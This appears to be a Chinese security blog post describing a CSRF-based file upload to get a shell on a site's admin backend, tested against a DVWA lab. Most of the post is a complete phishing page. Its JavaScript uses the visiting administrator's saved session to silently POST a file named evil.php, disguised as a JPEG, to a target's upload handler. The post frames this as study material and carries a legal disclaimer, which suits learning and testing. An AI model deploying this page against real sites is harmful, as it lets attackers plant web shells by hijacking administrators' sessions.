利用JavaScript进行后台文件上传getshell

  • 内容
  • 相关

看到一些XSS+CSRF上传的漏洞,这次就学习了一下HTML5的一些新特性,用JavaScript实现了文件上传。攻击者可以向管理员发送一个钓鱼页面,管理员只要打开了这个页面,并且当前浏览器保存了后台的会话信息,那么就有可能实现getshell。

1.1 软件环境


Chrome浏览器
DVWA-1.9漏洞测试平台
wamp3.0集成环境

1.2 host文件与虚拟目录配置


修改host文件,添加dvwa.me与hey.me指向本机
设置dvwa.me虚拟主机指向WEB_ROOT/dvwa
设置hey.me虚拟主机指向WEB_ROOT

二、利用详解

2.1 html源码

<html>
<head>
    <title>0dayhack漏洞测试</title>
</head>
<body>
    <form id="myForm" method="POST" name="myForm" action="ajax.php">
    <button id="submit_btn" type="button">Upload</button>
    </form>
    <script type="text/javascript">
        function btnClick(){
            document.getElementById("submit_btn").onclick=function(){
                var xmlhttp = new XMLHttpRequest();
                xmlhttp.withCredentials = true;
                var url = "https://www.0dayhack.com/";
                var formdata = new FormData();
                var filedata = new Blob(['This is evil txt'], {type: 'image/jpeg'});
                formdata.append("Upload","Upload");
                formdata.append("uploaded",filedata,"evil.php");
                xmlhttp.onreadystatechange=function(){
                    if (xmlhttp.readyState==4 && xmlhttp.status==200){
                        console.log(xmlhttp.responseText);
                    }
                }
                xmlhttp.open("POST",url,true);
                xmlhttp.send(formdata);
            }
        }
        btnClick();
    </script>
</body>
 
</html>

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:利用JavaScript进行后台文件上传getshell - https://www.0dayhack.com/post-782.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    杰您 Lv.2 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    很值得去学习啊!!

    福建省厦门市 电信